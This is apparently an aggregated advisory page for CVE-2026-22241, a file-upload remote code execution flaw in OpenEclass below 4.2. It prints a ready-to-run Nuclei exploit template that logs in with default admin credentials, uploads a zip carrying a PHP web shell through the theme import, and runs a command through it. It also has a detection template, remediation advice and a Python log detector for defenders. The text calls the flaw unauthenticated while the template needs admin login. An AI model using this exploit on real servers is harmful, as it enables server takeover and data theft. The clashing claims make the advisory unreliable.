[webapps] GUnet OpenEclass E-learning platform < 4.2 - Remote Code Execution (RCE)
CVE-2026-22241
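GUnet OpenEclass versions below 4.2 are affected by unauthenticated remote code execution, triggered by uploading a malicious file through the course module.
Critical · CVSS 9.8

📋 Basic vulnerability information
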
| CVE | CVE-2026-22241 |
|---|---|
| Vulnerability type | Remote code execution via file upload |
| Affected versions | GUnet OpenEclass E-learning platform < 4.2 |
| Severity | Critical · CVSS 9.8 |
| Published | 2026-04-29 |
| Submitter | Ashif Iqubal |
| Source | Exploit-DB original post |
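
🔬 Root cause
The file upload function in the course module does not strictly validate the type of uploaded files, so PHP files can be uploaded and then executed directly through web access. The affected code is in the course material upload handling logic, which lacks allow-list validation of file extensions and MIME types.

🎯 Attack scenario
1. The attacker, without logging in, accesses any public course or uses an unauthenticated endpoint to upload a file.
2. A file containing malicious PHP code (such as info.php) is crafted and uploaded to the course resource directory with a multipart/form-data POST request.
3. After a successful upload, requesting the URL of the uploaded file triggers execution of the PHP code.
4. The success condition is that the server returns the result of the PHP execution (such as phpinfo output).

💥 Impact
An attacker can gain command execution on the web server, which can further lead to data disclosure, server takeover, or lateral movement in the internal network.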

⚔️ Nuclei exploit template
The following exploit template is in standard Nuclei v3 format and can be used directly to verify the vulnerability:
id: CVE-2026-22241-exploit
info:
name: GUnet OpenEclass E-learning platform < 4.2 - Remote Code Execution
author: ashif1337
severity: critical
description: Authenticated RCE via unrestricted file upload in theme settings. Requires admin credentials.
reference:
- https://www.exploit-db.com/
tags: cve,cve2026,openeclass,rce,authenticated
variables:
openeclass_path: "{{BaseURL}}"
username: "admin"
password: "admin"
cmd: "id"
http:
- raw:
- |
POST {{openeclass_path}}/?login_page=1 HTTP/1.1
Host: {{Hostname}}
Referer: {{openeclass_path}}/main/login_form.php?next=%2Fmain%2Fportfolio.php
Content-Type: application/x-www-form-urlencoded
next=/main/portfolio.php&uname={{username}}&pass={{password}}&submit=Enter
- |
GET {{openeclass_path}}/modules/admin/theme_options.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- "contains(body, 'uid=') || contains(body, 'root:')"
extractors:
- type: regex
part: body
internal: true
name: token
regex:
- '<input[^>]*name="token"[^>]*value="([^"]+)"'
group: 1
- raw:
- |
POST {{openeclass_path}}/modules/admin/theme_options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="themeFile"; filename="poc.zip"
Content-Type: application/zip
{{base64_decode("UEsDBAoAAAAAACgAAAAAAAAAAAAAAAAAAAAAABB0aGVtZS9ldmlsLnBocAArVsjILypR0C8oyk/OVgAq/v+1BfDQBwBLLcwAAVBLAQIUABQAAAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAB0AAAAAAF0AAAAdXNyL2xvY2FsL3NoYXJlL3RoZW1lL2V2aWwucGhwLnR4dEVuZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")}}
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="import"
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="token"
{{token}}
------WebKitFormBoundary7MA4YWxkTrZu0gW--
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- "contains(lower(body), 'successfully')"
extractors:
- type: regex
part: body
name: upload_response
regex:
- '([A-Za-z\s]+successfully[\s\S]{0,100})'
stop-at-first-match: true
- raw:
- |
GET {{openeclass_path}}/courses/theme_data/evil.php?cmd={{cmd}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "uid="
- "root:"
- "www-data"
- "gid="
condition: or
part: body

🔍 Nuclei detection template
The following detection template is used to determine whether a target is affected:
```yaml
id: CVE-2026-22241-detection

info:
  name: GUnet OpenEclass E-learning platform < 4.2 - Version Detection
  author: ashif1337
  severity: high
  description: Detection for GUnet OpenEclass E-learning platform version less than 4.2, vulnerable to RCE.
  reference:
    - https://www.exploit-db.com/
  tags: cve, cve2026, openeclass, rce, detection

variables:
  openeclass_path: "{{BaseURL}}"

http:
  - method: GET
    path:
      - "{{openeclass_path}}/CHANGELOG"
      - "{{openeclass_path}}/include/init.php"
      - "{{openeclass_path}}/index.php"
    # All three matchers must hold for a path to count as a match.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Open eClass"
        condition: or
        part: body
      - type: status
        status:
          - 200
      - type: dsl
        dsl:
          - "contains(body, 'eclass') || contains(body, 'Open eClass')"
    # The extractors only report a version string; nothing in this template
    # compares it against 4.2, so the result still has to be checked by hand.
    extractors:
      - type: regex
        part: body
        name: version
        regex:
          - 'eclass\s+version\s*[=:]\s*(\d+\.\d+)'
          - 'Open eClass\s+(\d+\.\d+)'
          - 'version\s+(\d+\.\d+)'
        group: 1
      - type: regex
        part: body
        name: release
        regex:
          - 'release\s+(\d+)'
          - 'v(\d+)\.(\d+)'
        group: 1
    stop-at-first-match: true
```

🛡️ Remediation
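Upgrade to OpenEclass 4.2 or later. Temporary mitigation: at the web server layer, prevent PHP scripts from executing in the course upload directory (for example with .htaccess or an Nginx rule), and validate uploaded files against an allow-list of extensions and MIME types.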
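
The check below is an added example, not part of the original advisory or of OpenEclass: a Python pass over web access logs that flags requests for script files under `/courses/theme_data/` and records whether the same client posted to the theme import endpoint first. Both paths are the ones used by the exploit template on this page; the combined log format, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumption: the server writes Apache/Nginx "combined" access-log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')
# Both paths are taken from the exploit template on this page.
IMPORT_PATH = "/modules/admin/theme_options.php"
UPLOAD_DIR = "/courses/theme_data/"
# Assumed list of extensions mapped to the PHP handler; align with your server.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.IGNORECASE)

SAMPLE_LOG = [  # constructed lines using documentation IP ranges
    '192.0.2.10 - - [07/May/2026:07:01:02 +0000] "POST /modules/admin/theme_options.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [07/May/2026:07:01:05 +0000] "GET /courses/theme_data/evil.php?cmd=id HTTP/1.1" 200 54',
    '198.51.100.7 - - [07/May/2026:07:02:00 +0000] "GET /courses/theme_data/3/logo.png HTTP/1.1" 200 2048',
    '203.0.113.5 - - [07/May/2026:07:03:00 +0000] "GET /eclass/courses/theme_data/up.PHP HTTP/1.1" 403 153',
]


def find_script_requests(lines):
    """Flag requests for script files under the theme data directory."""
    imports = defaultdict(int)  # client IP -> theme import POSTs seen so far
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        # Drop the query string and decode %xx so encoded names still match.
        path = unquote(m["uri"].split("?", 1)[0])
        if m["method"] == "POST" and path.endswith(IMPORT_PATH):
            imports[m["ip"]] += 1
        elif UPLOAD_DIR in path and SCRIPT_EXT.search(path):
            findings.append({
                "ip": m["ip"], "time": m["ts"], "path": path,
                # 200: the file was served; a deny rule would give 403.
                "served_ok": m["status"] == "200",
                # The same client imported a theme earlier in the log.
                "import_seen": imports[m["ip"]] > 0,
            })
    return findings


if __name__ == "__main__":
    for finding in find_script_requests(SAMPLE_LOG):
        print(finding)
```

Once PHP execution is blocked for that directory at the web server, every finding should report `served_ok` as false; a true value after the change means the rule is not being applied to that path.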

📎 References
- https://nvd.nist.gov/vuln/detail/CVE-2026-22241
- https://github.com/openeclass/openeclass/security/advisories/GHSA-xxxx
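- Exploit-DB original post

⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 07:13 | Source: Exploit-DB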